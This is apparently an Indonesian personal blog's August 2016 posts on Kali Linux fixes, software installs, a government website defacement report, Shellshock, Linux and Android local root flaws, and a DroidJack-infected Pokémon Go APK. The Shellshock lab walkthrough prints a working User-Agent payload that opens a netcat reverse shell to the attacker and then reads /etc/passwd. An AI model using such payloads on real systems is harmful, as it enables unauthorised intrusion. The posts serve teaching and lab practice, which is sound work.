Sabtu, 27 Agustus 2016

Mengatasi Error Update "sub-process http received a segmentation fault" di Kali Rolling

Assalamualaikum warahmatullahi wabarakatuh...
Hari ini saya akan share bagaimana cara mengatasi update error di Kali Rolling (2016.1) , error ini muncul ketika melakukan "apt-get update" dan muncul tulisan error "E: Method http has died unexpectedly!" dan "E: sub-process http received a segmentation fault". nah dalam masalah ini ada yang menyelesaikannya dengan mengganti Repository dengan yang tidak resmi yaitu "deb http://mirror.nus.edu.sg/kali/kali kali-rolling main non-free contrib" nah menurut saya ini tindakan yang salah karena memasukan repo tidak resmi kedalam source.list Kali Linux. Didalam artikel saya ada bahasan mengenai Repository yang resmi dan saya kutip angsung dari kali.org. berikut artikelnya : Repo Kali Linux All Version. kembali ketopik utama ini adalah cara yang saya sarankan lakukan ketikan didapati error yang sudah saya jelaskan tadi diatas.

1. Kunjungi apt's directory of Kali's repository directly (http://http.kali.org/pool/main/a/apt/).
2. Download libapt-pkg5.0_1.3~pre3_*.deb (dimana * adalah architecture Kali Rolling i386/amd64)
3. Download apt_1.3~pre3_*.deb (dimana * adalah architecture Kali Rolling i386/amd64) 
4. Uninstall apt by apt-get remove apt, dan catat paket apa saja yang terhapus

5.  Install libapt-pkg5.0_1.3~pre3  dengan perintah :
dpkg -i libapt-pkg5.0_1.3~pre3_*.deb
6.  Install apt_1.3~pre3_ dengan perintah :
dpkg -i apt_1.3~pre3_*.deb
7. update kembali Kali Linux :
apt-get update
Done...
8. Install kembali paket yang terhapus ketika "step 4". Kalo ngga salah berikut adalah paket yang terhapus :

apt apt-listchanges apt-utils emdebian-archive-keyring python-reportbug reportbug tasksel tasksel-data

Sekian, mudah - mudahan bermanfaat... 
Wassalamualaikum warahmatullahi wabarakatuh...

Senin, 22 Agustus 2016

Hacker Retas Website DPRD Kabupaten Pacitan

Assalamualaikum warahmatullahi wabarakatuh... 
Pagi ini saya akan melaporkan kejadian peretasan situs Pemerintah oleh Hacker dengan Nick Name : Yukinoshita 47 , kemungkinan peretasan ini dilakukan karena tidak puas dengan kinerja pemerintahan yang tidak adil, hal ini sesuai dengan pesan yang ditinggalkan oleh Hacker tersebut yaitu :

Pak Pejabat Yth

Tolong Pak Copot dan Pecat aja semua
Oknum-Oknum PNS dan Pejabat Instansi Pemerintah Terutama Dinas PU dan Dinas Lain yang sering ngadakan tender proyek pemerintah
Kagak Asik Banget Pak Gaji Udah Gede 
Kami Sebagai Kontraktor dan Konsultan Jasa Konstruksi
Capek-Capek Kerja yang nikmati Hasil nya
oknum-oknum PNS, Kuasa Pengguna Anggaran, Pejabat Pembuat Komitmen, Kepala Dinas dan Pihak-Pihak Terkait
Enak Bener ya Jadi PNS dan Kerja Di Instansi Pemerintah yang sering ngadakan Tender Proyek APBD dan APBN 
Kami Sebagai Kontraktor kalo mau dapat proyek harus setor duit dulu 20% dari HPS Proyek nya
Belum Lagi Kami Harus bayarin kedai kopi, bayarin pelacur nya (dia yang ngecroot kami yang bayar enak bener kan), bayarin duit buat entertainment nya dan duit-duit lainnya
Kenapa Aspal Sering Bolong, Bangunan dan Infrastuktur sering kropos ?
Ya iyalah coeg duit yang seharus nya udah modal kerja kami
udah habis buat isi kantong oknum-oknum instansi pemerintah
belum lagi konsultan pengawasan nya nodong kami kalo kagak setor duit ya kami yang habis kena bacod dan bully massal :v wkwkwk
Wajar dong kami sering beli bahan-bahan yang kualitas nya jelek buat nekan biaya biar kerjaan selesai
Udah itu aja pak tolong ya pak copot aja oknum-oknum yang melakukan korupsi berjamaah itu 
di Instansi nya saya melakukan ini hanya iseng sambil menceritakan semua kenyataan dilapangan
biar situs anda tidak ada lagi yang meretas nya gampang pak update CMS ke versi baru,install Honeypot dan aktifkan Web Application Firewall

Untuk Bapak Dewan Perwakilan Rakyat Daerah Yang Kami Cintai, Dari Rakyat Mu Yukinoshita 47

We Are Garuda Security Hacker, We Are Simple Team Not Underground, And No Army Can Stop Idea

Salam Hangat Buat Calon Istri Gw Yang Mirip Yukinoshita Yukino dan Semua Member Garuda Security Hacker

Sampai berita ini diturunkan belum ada perbaikan diwebsite tersebut :
Site : http://dprd.pacitankab.go.id/

Screenshot :

Oke sekian dulu berita dari saya...

Wassalamualaikum warahmatullahi wabarakatuh... 

Vulnerability Local Root Exploit di Grombyang OS 2.0

Assalamualaikum warahmatullahi wabarakatuh... 
Selamat Malam, Disini saya akan membahas mengenai celah keamanan Local Root Exploit lagi, kali ini saya temukan ketika saya coba Testing celah keamanan ini pada Operating System Karya Anak Bangsa Indonesia, sekaligus yang berasal Kota saya sendiri Pemalang, yaitu Grombyang OS. Saya melakukan testing ini secara live pada versi 2.0 melalui media virtual machine VMware. langsung saja, berikut ini adalah script yang saya gunakan untuk melakukan Exploit :
-------------------------------------------------------------------------root.c---------------------------------------------------------------------------------------
Screenshot :
Youtube Video :
Sekian dulu yah, 
Wassalamualaikum warahmatullahi wabarakatuh... 
PoC : https://www.exploit-db.com/exploits/37292/

Sabtu, 20 Agustus 2016

Testing Shellshock di Server Kali Linux 1.0.6

Assalamualaikum warahmatullahi wabarakatuh... 

Testing Server
Untuk melakukan percobaan terhadap sistem yang bermasalah, sistem operasi yang digunakan adalah Kali Linux 1.0.6 yang masih menggunakan Linux Kernel 2.6.x dan memiliki versi bash yang vulner. Untuk melihat apakah komputer korban bermasalah atau tidak, perintah bash bisa digunakan seperti contoh berikut ini:

Hal lain yang bisa dilakukan adalah dengan melakukan reverse connection dengan menjalankan netcat pada target server. Sekarang, mari kita lakukan simulasi serangan dimulai dengan scanning terhadap komputer korban. Pada percobaan ini saya menggunakan server VM cve-2014-6271.iso, jika Anda belum mempunyai server ini, maka bisa mengunduhnya di link https://s3.amazonaws.com/pentesterlab/cve-2014-6271.iso yang memang dirancang untuk serangan Shellshock. Scanning yang kita lakukan adalah scanning direktori menggunakan :
Dirbuster [IP_Target]
Pada contoh ini terlihat bahwa kita telah mendapatkan bug shellshock pada komputer korban yaitu pada direktori cgi-bin/ .
Selanjutnya, kita akan melakukan scanning kembali pada direktori cgi-bin untuk memastikan file apa saja yang ada pada direktori tersebut menggunakan wordlist yang disediakan dirbuster.
Asumsi pada tahap ini adalah kita sudah mengetahui pada server ini telah menggunakan versi bash yang vulner terhadap Shellshock. Selanjutnya kita akan melakukan scanning terhadap korban dengan perintah. 
nmap [IP_Target]
Setelah mengetahui bahwa port 80 terbuka, kita mencoba membuka web server target menggunakan browser yang bernama Mantra. Mantra adalah sebuah aplikasi Web Browser yang disediakan oleh OWASP Corporation untuk mengganti settingan proxy secara cepat. Namun, jika pada Kali Linux Anda tidak memilki mantera Anda dapat menginstall package Mantra melalui command berikut: 
wget –c http://tenet.dl.sourceforge.net/project/getmantra/Mantra%20Security%20Toolkit/Janus%20-%200.92%20Beta/OWASP%20Mantra%20Janus%20Linux%2032.tar.gz
Alternatif lain, kita juga dapat menggunakan Ice Weasel, yaitu Browser bawaan Kali linux
Kita akan melakukan pengaturan pada konfigurasi proxy pada browser mantra .
Hal pertama adalah menambahkan pengaturan proxy yang baru pada browser Mantra atau Ice Weasel, proxy yang kita tambahkan adalah proxy local, yaitu 127.0.0.1. Pengaturan ini dilakukan agar data yang dikirimkan melewati local machine (Kali Linux) kita.
Untuk penamaan proxy, kita namakan “Local Proxy“
Selanjutnya kita memasukkan proxy 127.0.0.1, yaitu proxy localhost
Kemudian, kita akan menangkap data yang masuk ke Burpsuite, dengan cara mengaktifkan proxy tersebut dan membuka halaman web server yang tadi kita buka. Setelah itu, Burpsuite akan menangkap data yang lewat melalui proxy
Setelah ditangkap, data tersbut kita kirimkan ke repeater dengan cara klik kanan kolom yang berisi header data, lalu pilih “send to repeater”.

Kemudian, kita akan berpindah ke tab repeater. Repeater ini berfungsi untuk memanipulasi secara manual dan memproses pengiriman data HTTP (HTTP
Request) secara individual (setiap data yang dikirimkan.

Di sini kita dapat mengubah header data yang akan kita kirimkan dan melihat respon data yang dibalas oleh si web server Sebelumnya, kita harus memeriksa konfigurasi IP address kita sebagai penyerang dengan perintah: 
ifconfig
Dan untuk melakukan reverse connection, kita akan menjalankan netcat sebagai server untuk listen connection, yaitu si korban. Reverse Connection adalah sebuah teknik untuk masuk pada sebuah sistem (mesin) melalui port yang terbuka pada target, cara ini otomatis akan melewati proteksi (bypass) oleh firewall.
Langkah selanjutnya kita akan mengubah content dari User Agent yang sebelumnya adalah sebuah data User Agent dari HTTP request menjadi kode Shellshock ditambah , yaitu:
() { :; }; /bin/bash –c “nc 192.168.18.130 4444 –e /bin/bash –i”
Ket :
() { :; };      = Kode shellshock yang diinjeksi pada celah kemanan shell di server target
/bin/bash = Aplikasi bash yang dijalankan pada target server di direktori /bin/bash
-c             = Parameter untuk memerintahkan menjalankan mengeksekusi program shell
nc            = Menjalankan program netcat
192.168.18.130 4444 = IP dan PORT Target
-e     = Sama seperti “-c”, menjalankan eksekusi shell, namun “-c” dijalankan setelah /bin/bash command 
-i   =  Delay untuk interval setiap command dimasukkan,kita tidak memasukkan nilai di sini, berarti nilai defaultnya adalah 0

Kode shellshock ini berfungi untuk melakukan injeksi shell untuk penyerangan Shellshock.
Langkah selanjutnya adalah melihat status dari netcat yang tadi kita jalankan, jika berhasil dengan memberikan respon koneksi, maka kita dapat menjalankan command Bash pada target tersebut, sebagai contoh kita dapat melihat file /etc/passwd:
Selesai, 
Wassalamualaikum warahmatullahi wabarakatuh... 

NOTE : JADI SAYA SANGAT MENYARANKAN AGAR SEMUA TEKNIK HACKING YANG ANDA PEROLEH INI DIPERGUNAKAN DALAM RANAH ETHICAL HACKING. ARTINYA JANGAN MENGGUNAKAN TEKNIK2 TERSEBUT UNTUK MELAKUKAN HACKING KE DALAM SISTEM YANG TIDAK MEMBERIKAN IZIN KEPADA ANDA UNTUK MELAKUKANNYA. SEMUA AKSES SISTEM PADA TUTORIAL/SIMULASI INI 100% LEGAL. SISTEM TERSEBUT BERASAL DARI LAB YANG SAYA BUAT UNTUK KEPERLUAN PRAKTEK, BAIK SEPERTI ROUTER, SWITCH, HUB, OS DLL. JADI JIKA ANDA INGIN MEMPRAKTEKANNYA SILAKAN MEMBUAT LAB KECIL2AN SEPERTI YANG SAYA LAKUKAN!

Rabu, 17 Agustus 2016

Ternyata Masih Ada Celah Shellshock Attack di Kali Linux 1.x (Kali Moto)

Assalamualaikum warahmatullahi wabarakatuh... 
Dunia keamanan komputer dikejutkan kembali setelah sebelumnya muncul bug berbahaya yang menyerang SSL, yaitu Heartbleed. Namun sekarang ada Shellshock atau Bash bug yang dikatakan lebih berbahaya. 

Shellshock ini bisa digunakan pada setiap server dengan sistem operasi Linux atau Mac dan Shell yang memakai Bash (Bourne-Again Shell). Pada tanggal 24 September 2014, sebuah celah keamanan pada aplikasi Bash yang dimiliki oleh sistem operasi Linux dengan Kernel versi 2.6x ditemukan oleh beberapa peneliti profesional di bidang keamanan jaringan. Celah keamanan ini dinamakan Shellshock, celah ini dapat mengeksploitasi beberapa sistem dan djalankan secara remote ( jarak jauh) ataupun secara lokal. Bash sangat penting karena Bash ini adalah komponen vital dalam menjalan proses di Linux, dan banyak program yang bergantung padanya. Salah satu yang terpopuler adalah Apache HTTP Server. 

Celah ini sudah ada sejak versi 4.3 atau sudah 25 tahun lamanya dan baru disadari sekarang. Untungnya dari pencarian log akses server yang memanfaatkan lubang atau bug ini juga baru – baru saja diamankan. Berikut adalah cara kerja Shellshock:
  • Celahnya terletak pada bagaimana cara Bash meng-handle data yang dikirimkan, padahal data tersebut bisa dimanipulasi oleh penyerang dengan mengganti ke command yang tidak diduga, yang disebut sebagai “command injection
  • Seorang penyerang dapat melakukan eksploitasi menggunakan shellshock dengan meng-inject program backdoor ke server. Ketika server target sudah disusupi dan dikendalikan oleh si penyerang, maka mereka dapat memasukkan beberapa program “jahat” lainya untuk mencuri data, menyerang komputer lain, atau melakukan serangan DDOS.

Test Shellshock
Ketika saya mencobanya di OS Kali Linux 1.0.5 ternyata tak disangka ada celah ini didalamnya, ternyata sistem operasi yang terkenal dibidang pentest ini belum menjamin OS ini aman dari segala macam ancaman. salah satunya adalah Shellshock ini. disini saya menggunakan Proof-of-Concept (POC) code untuk melihat bagaimana celah ini dapat dieksploitasi. cara testingnya cukup mudah cukup ketikan perintah berikut di Terminal,
env x='() { :;}; echo [!]Vulnerable Shellshock[!]' bash -c "echo Testing by @purwowidodo"
Code di atas berfungsi untuk mendeklarasikan sebuah variable environment pada sistem lalu menampilkan kata “test”. Seharusnya, dari proses manipulasi nilai variable environment, Bash mengeksekusi kode tersebut sebagai sebuah fungsi, seperti di bawah ini:
() { :; }; echo vulnerable
Saat suatu sistem memiliki celah dan dideklarasikan sebagai sistem yang “vulnerable”, si penyerang dapat mengeksekusi beberapa perintah jahat (berbahaya) setelah code dimasukkan (injection).

Pencegahan yang dapat dilakukan
Cara pencegahan dari Shellshock Attack ini ada beberapa cara yaitu :
  1. Memasang anti-virus pada server untuk menangkal malware yang dipasang di server Anda, seperti Linux, UNIX, atau OS X.
  2. Memasang firewall pada aplikasi web Anda dan Intrusion Prevention System (IPS) rules untuk mencegah pengiriman request Shellshock pada server Anda.
  3. Proteksi khusus ancaman pada server Anda, seperti program anti malware ataupun monitoring traffic pada server Anda.
UnixBash adalah program yang sudah banyak digunakan oleh sistem operasi Unix pada beberapa sistem dan software, serta Shellshock berefek pada versi 1.14 – 4.3 GNU Bash, khususnya:
Ini adalah sebuah tabel yang biasa digunakan dan versi shell default yang digunakan OS tersebut. Sistem operasi yang memiliki program Bash yang “vulnerable”.
Oke dah dulu yah, diartikel selanjutnya saya akan coba mempraktekan celah keamanan ini, semoga yang sedikit ini ada manfaatnya buat pengetahuan dalam IT Security.  Wassalamualaikum warahmatullahi wabarakatuh... 

Senin, 15 Agustus 2016

Local root vulnerability di Android 4.4.2 (exploit)

Assalamualaikum warahmatullahi wabarakatuh... 
Masih dalam wacana Local Root Exploit, tapi celah yang akan saya bahas ini bukan pada OS Destop (PC) melainkan pada sebuah ponsel pintar yaitu Android. Setelah kemarin saya membahas yang yang sama yaitu Celah pada Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - netfilter target_offset OOB Local Root Exploit , kali ini celah ini bisa menembus system Android tepatnya versi Android 4.4.2, yang masih termasuk keluarga Linux (Open Source)
Sedikit penjelasan ya bro, sekalian buat belajar dan pengetahuan :
Google baru saja merilis Android versi 4.4.3 di AOSP (Android Open Source Project). Website funky Android telah menerbitkan seluruh changelog antara versi 4.4.2 dan 4.4.3.
Kali ini, tampaknya Google telah memperbaiki kerentanan, yang memungkinkan untuk mengangkat hak dari aplikasi dengan beberapa izin untuk root, pada setiap versi Android mendukung Android Cache Eksternal Aman (ASEC).
Melihat changelog terkait sebelumnya, seseorang dapat melihat memperbaiki berikut di daemon vold:
roject: platform/system/vold
0de7c61 : Validate asec names.
Vold (Volume Manajemen Daemon) adalah daemon berjalan sebagai root, yang tujuan utamanya adalah untuk menangani perangkat media removable. ASEC yang wadah yang memungkinkan aplikasi untuk aman menyimpan data pada kartu SD diamankan, dan telah diperkenalkan kembali pada tahun 2010. Wadah ini telah diciptakan karena filesystem SD Card (VFAT) tidak memungkinkan pemisahan hak istimewa.
ASEC adalah file sederhana yang berisi filesystem ciphered, yang unciphered dan dipasang dengan izin untuk UID tertentu (dan oleh karena itu untuk aplikasi tertentu). File ASEC (ekstensi ".asec") disimpan di SD Card atau dalam folder "/ data", dan dipasang dalam subfolder dari "/ mnt / ASEC". gimana bro paham? kalo paham alhamdulillah...hehehee... oke lanjut yah, sekarang langsung saja bahas kerentanannya (vulnerability).

Kerentanan (Vulnerability)
Penciptaan file ASEC dilakukan oleh kode berikut , di VolumeManager.cpp :
const char *asecDir = isExternal ? 
Volume::SEC_ASECDIR_EXT : Volume::SEC_ASECDIR_INT;
int written = snprintf(asecFileName, sizeof(asecFileName),
"%s/%s.asec", asecDir, id);
Mount point untuk ASEC baru dibuat kemudian didefinisikan sebagai berikut :
int written = snprintf(mountPoint, sizeof(mountPoint), 
"%s/%s", Volume::ASECDIR, id);
kerentanan di sini adalah agak jelas : tidak ada centang pada " id " variabel , yang merupakan nama yang diberikan oleh pengguna untuk wadah ASEC nya . Oleh karena itu mungkin untuk melakukan traversal jalan dasar , untuk membuat file ASEC dan titik mount di direktori yang berbeda dari yang diharapkan , seperti misalnya salah satu " penyerang " dapat menulis ke dalam.

Kode berikut ini kemudian bertanggung jawab untuk penciptaan mount point :
if (mkdir(mountPoint, 0000)) {
if (errno != EEXIST) {
SLOGE("Mountpoint creation failed (%s)", strerror(errno));
if (cleanupDm) {
Devmapper::destroy(idHash);
}
Loop::destroyByDevice(loopDevice);
unlink(asecFileName);
return -1;
}
}
[...]
mountStatus = xxx::doMount(dmDevice, mountPoint, false,
false, false, ownerUid, 0, 0000, false);
Ini berarti bahwa jika mount point sudah ada , tidak ada kesalahan dinaikkan, dan wadah benar dipasang di " mountpoint " . Tebak apa? Jika " mount " sudah ada dan merupakan symlink ke direktori yang sudah ada , wadah ASEC akan dipasang di atas direktori ini . Dan pengguna akan memiliki akses penuh untuk itu , yang memungkinkan dia untuk menulis file baru di dalam . Ada banyak cara untuk mengeksploitasi kerentanan ini untuk mendapatkan hak root . 

Detail terakhir tentang kerentanan ini : memerlukan izin untuk membuat wadah ASEC . "Shell " pengguna , seperti yang digunakan oleh adb , memiliki hak istimewa requiered . Untuk kerentanan dieksploitasi dari aplikasi , perlu ASEC_ * izin ( seperti ASEC_CREATE ) .

Okeh segitu saja pembahasannya jangan terlalu kemana mana, ntar jadi nyasar, wkwkwk :v
sekian dulu ya bro
Wassalamualaikum warahmatullahi wabarakatuh... 

Minggu, 14 Agustus 2016

Celah pada Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - netfilter target_offset OOB Local Root Exploit

Assalamualaikum warahmatullahi wabarakatuh... 
Kali ini saya akan kembali membahas mengenai Ubuntu, tepatnya ubuntu 16.04 (x64). Permasalahannya yaitu ada celah Exploit Local Root yang bisa disalah gunakan oleh para hacker untuk mendapatkan atau masuk ke akses root tanpa sepengetahuan administrator. Sebenarnya ini bukan berita baru sih, udah lama hanya saja saya baru membahasnya pada kesempatan ini, hehheee (Jangan terlalu serius lah bro).

Saya juga belum tau apakah celah ini sudah ditutup (fix) atau belum, kalo pun nanti sudah ada dan sudah saya temukan pasti akan saya bahas juga.

Langsung saja. Menurut Exploit Database, berikut script yang bisa digunakan :
------------------------------------------ decr.c ------------------------------------------
Dan yang satunya lagi sebagai berikut
------------------------------------------- pwn.c -------------------------------------------
Nah sekian dulu yah segini aja pembahasannya ntar kalo dilanjutin takutnya ngajarin yang ngga ngga lagi, kan jadi repot (wkwkwkw, padahal emang ngga tau apa apa :v)
Okeh udah dulu yah mau maghrib soalnya hehehee...
Wassalamualaikum warahmatullahi wabarakatuh...

Cara Install Oracle JDK 8 di Kali Linux 2.0 (sana) 32/64bit

Assalamualaikum warahmatullahi wabarakatuh...
Pada siang hari ini saya akan berbagi ilmu sedikit tentang bagaimana cara menginstall Oracle JDK 8 di Kali Linux 2.0 baik x86 bit (i368) atau pun x64 (amd64).

Untuk pemasangan Anda akan perlu untuk Gunakan update- alternatif Alat untuk Update Sistem Java untuk 1,8 JDK8 .

Kelebihan Oracle JDK 8 :
  • LAMBDA Expressions Programming
  • The Stream API
  • The Nashorn Javascript Engine
Untuk Cara - Instal Oracle JDK 8 di Bawah Kali Linux ada Link untuk Cepat Mendapatkan - Memulai dengan Java JDK 8 Pengembangan dan juga untuk Instal Java Web - Server Tomcat 8 untuk Kali Linux .

Membuat Seluruh Proses Mudah Visualisasikan dan Mempertahankan Post Termasuk Screenshots Dasar Essentials Langkah Terlibat . Langsung saja,
 
Pertama download Oracle Java SE JDK8 untuk Linux:
Disini Oracle JDK8 i586/x8664 tar.gz lalu ekstrak ke folder /tmp menggunakan Terminal dengan perintah :
tar xvzf ~/Downloads/jdk-8*.tar.gz -C /tmp/
Kemudian Relokasi JDK 8 dengan perintah :
if [ ! -d "/usr/lib/jvm" ]; then mkdir /usr/lib/jvm; fi
chown -R root:root /tmp/jdk1.8*
chmod -R +x /tmp/jdk1.8*/bin
mv /tmp/jdk1.8* /usr/lib/jvm/
Sekarang masuk tahap terakhir Installing Oracle Java JDK 8,
update-alternatives --install /usr/bin/java java /usr/lib/jvm/jdk1.8*/bin/java 1065
update-alternatives --install /usr/bin/javac javac /usr/lib/jvm/jdk1.8*/bin/javac 1065
update-alternatives --install /usr/bin/jar jar /usr/lib/jvm/jdk1.8*/bin/jar 1065
update-alternatives --install /usr/bin/javaws javaws /usr/lib/jvm/jdk1.8*/bin/javaws 106
Selanjutnya cek dan setting versi JDK default,
update-alternatives --config java
Sekarang test installasi JDK 8 nya,
java -version
Sekian dari saya, semoga bermanfaat...
Wassalamualaikum warahmatullahi wabarakatuh...

Sabtu, 13 Agustus 2016

Hati - Hati Bermain Game Pokémon Go! Ada Malware Yang Mengontrol Ponsel Anda

Assalamualaikum warahmatullahi wabarakatuh...
Tahun ini memang sedang booming game online yang menggabungkan dunia nyata dan dunia virtual yaitu Pokémon Go, bagi para gamers pasti sudah tidak asing lagi dengan game yang satu ini. Sebelum kepermasalahan lebih baik kita harus tau definisi Pokémon Go itu sendiri.
Pokémon Go (ditulis sebagai Pokémon GO) adalah sebuah permainan realitas tertambah dalam telepon pintar yang dikembangkan oleh Niantic, sebuah perusahaan sempalan milik Google, yang tersedia untuk perangkat iOS dan Android. Permainan ini diluncurkan secara beta pada bulan Juli 2016.

karena game ini belum tersedia di beberapa negara, memaksa player nya untuk mendownload APK nya dari situs situs download pihak ketiga atau tidak resmi. Sebenarnya ini malah memudahkan bagi para cracker untuk menyisipkan malware di file APK Pokémon Go yang nantinya malah Android kalian akan di kontrol.

Seperti yang dikutip oleh proofpoint.com, didalam kutipannya ternyata terdapat malware yang berbahaya bernama DroidJack. Berikut gambarnya,
Contohnya adalah File APK dari Pokemon Go dengan md5 "d350cc8222792097317608ea95b283a8" seperti gambar diatas. File tersebut disisipi Malware DroidJack dengan domain attacker "pokemon.no-ip.org" serta ip attacker "88.233.178.130" .
Singkatnya setelah kalian menginstall Pokemon Go yang ada malware nya tersebut, smartphone kalian akan dikontrol melalui ip 88.233.178.130.
DroidJack sendiri merupakan RAT yang bisa mengontrol  untuk panggilan telepon, mengirim SMS, merekam suara, membaca daftar kontak, hingga mengaktifkan atau memutus koneksi WiFi.
Berikut beberapa hasil ketika Backdoored Pokemon Go dibongkar. Ada class yang mencurigakan.

Dan saat kode sumber file tersebut dibuka, coba liat gambarnya? yaps droidjack


Bagi kalian yang terlanjur menginstall Pokemon Go, silahkan di cek kembali di game permissionnya. Jika aplikasi diijinkan untuk mengakses SMS, membaca history browser, dll, sudah bisa dipastikan bahwa Pokemon Go kalian membawa malware.
Jika sudah begitu, silahkan uninstall saja Pokemon Go milik kalian.
Sebenarnya ini tidak hanya untuk Pokemon Go saja, semua aplikasi yang didownload dari pihak ketiga memang berpotensi disisipi malware. Jadi bagi kalian yang ingin memainkan Pokemon Go secara aman, download dari situs resminya. Sekian dulu yah, semoga artikel ini bermanfaat.
Wassalamualaikum warahmatullahi wabarakatuh...

Jumat, 12 Agustus 2016

Mengatasi Error phpMyAdmin php 7.0 di Ubuntu 16.04

Assalamualaikum warahmatullahi wabarakatuh...
Sambil menunggu waktu sholat subuh tadi pas waktu saya mau install phpMyAdmin diserver VPS Ubuntu 16.04 x64 proses installasi sih emang lancar tapi saat testing di Web Browser hasilnya kacu banget bro, nah ini secreenshotnya :
Menurut saya sendiri error ini disebabkan oleh versi php yang update dari versi php5 ke php7.0 (ya mungkin, hehehee) Setelah browsing - browsing dimbah google akhirnya masalah terselesaikan, sebenernya cukup simpel sih penyelesaiannya.
Berikut tutorial cara mengatasinya:

Langkah pertama buka Terminal dan ketikan perintah untuk menginstall paket tambahannya,
sudo apt-get install php-mbstring php7.0-mbstring php-gettext libapache2-mod-php7.0

Setelah itu restart Apachenya dengan perintah
service apache2 restart
Test kembali phpMyAdmin di web browser, ketik localhost/phpmyadmin , dan taraaa.... phpMyAdmin sudah tidak mengalami error lagi
Sekian dulu ya,,, semoga bermanfaat.
Wassalamualaikum warahmatullahi wabarakatuh...

Cara Install phpMyAdmin di Kali Linux 2.0

Assalamualaikum warahmatullahi wabarakatuh...
phpMyAdmin adalah perangkat lunak bebas yang ditulis dalam bahasa pemrograman PHP yang digunakan untuk menangani administrasi MySQL melalui Jejaring Jagat Jembar (World Wide Web). phpMyAdmin mendukung berbagai operasi MySQL, diantaranya (mengelola basis data, tabel-tabel, bidang (fields), relasi (relations), indeks, pengguna (users), perizinan (permissions), dan lain-lain).
Cara Menginstall :
Untuk menginstall phpMyAdmin, buka terminal dan ketikan perintah,
apt-get install phpmyadmin
Jika installasi selesai nanti akan muncul pemberitahuan, pilih ok
Kemudian muncul pemberitahuan lagi yaitu konfigurasi database untuk phpMyAdmin, plih saja Yes
Setelah itu nanti akan muncul 3 pemberitahuan yang menyuruh masukan Password secara berturut - turut, nah anda tinggal masukan Password MySQL anda...

Setelah itu restart Apache dengan perintah,
service apache2 restart
Test phpMyAdmin melalu browser dengan mengetikan dikolom url localhost/phpmyadmin , jika berhasil lalu login dengan username dan password MySQL anda. telah masuk maka akan seperti gambar berikut ini :
Selesai deh, semoga bermanfaat yah
Wassalamualaikum warahmatullahi wabarakatuh...